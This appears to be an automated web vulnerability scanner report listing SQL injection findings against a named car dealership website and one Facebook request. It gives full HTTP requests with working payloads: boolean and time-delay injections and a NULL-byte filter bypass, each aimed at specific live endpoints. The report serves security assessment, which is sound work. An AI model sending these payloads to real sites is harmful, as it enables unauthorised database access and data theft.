<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z2/r/p6y1y21JrZi.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/zQ/r/IUPuxNuZZDM.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/zJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/z7/r/5875srnzL-I.ico" /></head>
<body class="WelcomePage UIPage_LoggedOut ie7 win Locale_en_US">
<div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;" ></div><div id="blueBar" class="loggedOut"></div><div id="globalContainer"><div id="dialogContainer"></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div ><!-- 2365fa3194ecdc0cab15721ce967a9f8663937c7 -->
<div class="WelcomePage_Container"><div class="loggedout_menubar_container"><div class="clearfix loggedout_menubar"><a class="lfloat" href="/" title="Go to Facebook Home"><i class="fb_logo img spritemap_aanaup sx_cd927a" title="Facebook logo"></i></a><div class="rfloat"></div></div></div><div class="WelcomePage_MainSell"><div class="WelcomePage_MainSellCenter clearfix"><div class="WelcomePage_Warnings"><div id="standard_status" class="UIMessageBox status"><h2 class="main_message">Javascript is disabled on your browser. Please enable JavaScript or upgrade to a Javascript-capable browser to use Facebook. Alternativly, you can access the mobile version of Facebook <a href="http://m.facebook.com/">here</a>.</h2><p class="sub_message"></p></div></div><div class="WelcomePage_MainSellLeft"><div class="WelcomePage_MainMessage">Facebook helps you connect and share with the people in your life.</div><div class="WelcomePage_MainMap">&nbsp;</div></div><div class="WelcomePage_MainSellRig
...[SNIP]...

Request 2

GET /logout.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=1285988221-da9465b31b1cec814c13f1f6b4ae65cdbc0d9239959dc268afeca; wd=450x40; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews1reports.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews1reports.com%252Fdefault-js.asp%253Fview%253D0%2526funnelid%253DF180%2526a%253Db%2526siteid%253DAPS%2526vid%253Dctt_id%253D%2526ctt_adnw%253D%2526ctt_ch%253D%2526ctt_entity%253D%2526ctt_cli%253D%2526ctt_kw%253D%2526ctt_adid%253D%2526ctt_nwtype%253D%26extra_2%3DUS'%20and%201%3d2--%20;

Response 2 (redirected)

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=k47Eg; path=/; domain=.facebook.com
Set-Cookie: noscript=1; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 08 Dec 2010 01:55:26 GMT
Content-Length: 14148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/zm/r/_0agVp2CPvr.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/zb/r/UCbfq1H_xvH.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/z9/r/OexS-J-uMsq.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/zn/r/DAW4CKZxmmR.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/zJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/z7/r/5875srnzL-I.ico" /></head>
<body class="WelcomePage UIPage_LoggedOut ie7 win Locale_en_US">
<div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;" ></div><div id="blueBar" class="loggedOut"></div><div id="globalContainer"><div id="dialogContainer"></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div ><!-- 2365fa3194ecdc0cab15721ce967a9f8663937c7 -->
<div class="WelcomePage_Container"><div class="loggedout_menubar_container"><div class="clearfix loggedout_menubar"><a class="lfloat" href="/" title="Go to Facebook Home"><i class="fb_logo img sp_aanaup sx_cd927a" title="Facebook logo"></i></a><div class="rfloat"></div></div></div><div class="WelcomePage_MainSell"><div class="WelcomePage_MainSellCenter clearfix"><div class="WelcomePage_Warnings"><div id="standard_status" class="UIMessageBox status"><h2 class="main_message">Javascript is disabled on your browser. Please enable JavaScript or upgrade to a Javascript-capable browser to use Facebook. Alternativly, you can access the mobile version of Facebook <a href="http://m.facebook.com/">here</a>.</h2><p class="sub_message"></p></div></div><div class="WelcomePage_MainSellLeft"><div class="WelcomePage_MainMessage">Facebook helps you connect and share with the people in your life.</div><div class="WelcomePage_MainMap">&nbsp;</div></div><div class="WelcomePage_MainSellRight"><div cl
...[SNIP]...

1.147. http://www.fremonttoyota.com/AF2/milapi/0.2/mil.php [confid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.fremonttoyota.com
Path:   /AF2/milapi/0.2/mil.php

Issue detail

The confid parameter appears to be vulnerable to SQL injection attacks. The payloads 11313056'%20or%201%3d1--%20 and 11313056'%20or%201%3d2--%20 were each submitted in the confid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /AF2/milapi/0.2/mil.php HTTP/1.1
Host: www.fremonttoyota.com
Proxy-Connection: keep-alive
Referer: http://www.fremonttoyota.com/recall2010.html
Origin: http://www.fremonttoyota.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; BIGipServerAPACHE_DEV=2936078602.20480.0000; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmb=198428792; __utmc=198428792; __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 20

confid=fremonttoyota11313056'%20or%201%3d1--%20

Response 1

HTTP/1.0 500 Internal Server Error
Date: Wed, 08 Dec 2010 00:45:16 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 00:45:17 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: application/xml; charset=utf-8
Content-Length: 0

Request 2

POST /AF2/milapi/0.2/mil.php HTTP/1.1
Host: www.fremonttoyota.com
Proxy-Connection: keep-alive
Referer: http://www.fremonttoyota.com/recall2010.html
Origin: http://www.fremonttoyota.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; BIGipServerAPACHE_DEV=2936078602.20480.0000; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmb=198428792; __utmc=198428792; __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 20

confid=fremonttoyota11313056'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 00:45:18 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 00:45:19 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Content-Type: application/xml; charset=utf-8
Content-Length: 66

<?xml version="1.0" ?><results><disclaimer></disclaimer></results>

1.148. http://www.fremonttoyota.com/Toyota-Dealer/Fremont/About%20Us/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.fremonttoyota.com
Path:   /Toyota-Dealer/Fremont/About%20Us/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /Toyota-Dealer/Fremont/About%20Us/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 02:22:17 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:22:19 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 02:22:18 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 17374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>Toyota Dealer Servin
...[SNIP]...
<br /> Thanks to our delightful location near Fremont, our exceptional Toyota products and services are available to our friendly neighbors all around Alameda County, and furthermore, to commuters throughout Northern California. Here at Fremont Toyota, you will discov
...[SNIP]...

Request 2

GET /Toyota-Dealer/Fremont/About%20Us/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 02:22:29 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:22:31 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 02:22:30 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 17421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>Toyota Dealer Servin
...[SNIP]...

1.149. http://www.fremonttoyota.com/Toyota-Dealer/Fremont/About%20Us/ [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.fremonttoyota.com
Path:   /Toyota-Dealer/Fremont/About%20Us/

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /Toyota-Dealer/Fremont/About%20Us/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1%00'; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 02:04:16 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:04:17 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 02:04:17 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 17447

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>Toyota Dealer Servin
...[SNIP]...
<br /> Thanks to our delightful location near Fremont, our exceptional Toyota products and services are available to our friendly neighbors all around Alameda County, and furthermore, to commuters throughout Northern California. What you'll find at Fremont Toyota is t
...[SNIP]...

Request 2

GET /Toyota-Dealer/Fremont/About%20Us/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1%00''; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 02:04:22 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:04:23 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 02:04:23 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 16910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>Toyota Dealer Servin
...[SNIP]...

1.150. http://www.fremonttoyota.com/Toyota-Dealer/San%20Leandro/About%20Us/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fremonttoyota.com
Path:   /Toyota-Dealer/San%20Leandro/About%20Us/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 17557 milliseconds to respond to the request, compared with 1841 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /Toyota-Dealer',0,0)waitfor%20delay'0%3a0%3a20'--/San%20Leandro/About%20Us/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response

HTTP/1.1 404 Not Found
Date: Wed, 08 Dec 2010 03:05:44 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 47928

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving Stockton - Serving Watso
...[SNIP]...

1.151. http://www.fremonttoyota.com/Toyota/Corolla/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fremonttoyota.com
Path:   /Toyota/Corolla/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 54409 milliseconds to respond to the request, compared with 11073 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /Toyota',0,0)waitfor%20delay'0%3a0%3a20'--/Corolla/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response

HTTP/1.1 404 Not Found
Date: Wed, 08 Dec 2010 03:40:49 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 47942

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving Stockton - Serving Watso
...[SNIP]...

1.152. http://www.fremonttoyota.com/Toyota/Highlander%20Hybrid/ [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.fremonttoyota.com
Path:   /Toyota/Highlander%20Hybrid/

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /Toyota/Highlander%20Hybrid/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792%00'; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 02:26:52 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:26:54 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 02:26:53 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 25507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Highland
...[SNIP]...
ority are abundant in the stylish 2011 Toyota Highlander Hybrid package. The all new Highlander Hybrid is exalted and for good reason; it boasts only the highest quality in features and design without exception. <br />
...[SNIP]...

Request 2

GET /Toyota/Highlander%20Hybrid/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792%00''; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 02:27:09 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:27:10 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 02:27:10 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 25654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Highland
...[SNIP]...

1.153. http://www.fremonttoyota.com/Toyota/Sequoia/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.fremonttoyota.com
Path:   /Toyota/Sequoia/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /Toyota/Sequoia/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:20:41 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:20:42 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:20:42 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 37576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Sequoia
...[SNIP]...
<br /> Inside and out, the 2011 Sequoia never fails to impress with a polished front chrome grille, sporty rear spoiler, and convenient roof racks for transporting oversized cargo. Additionally, all 8 passengers will love the detailed wood-trimmed int
...[SNIP]...

Request 2

GET /Toyota/Sequoia/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:20:57 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:20:58 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:20:58 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 37311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Sequoia
...[SNIP]...

1.154. http://www.fremonttoyota.com/Toyota/Sienna/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fremonttoyota.com
Path:   /Toyota/Sienna/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 90730 milliseconds to respond to the request, compared with 17471 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /Toyota'waitfor%20delay'0%3a0%3a20'--/Sienna/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

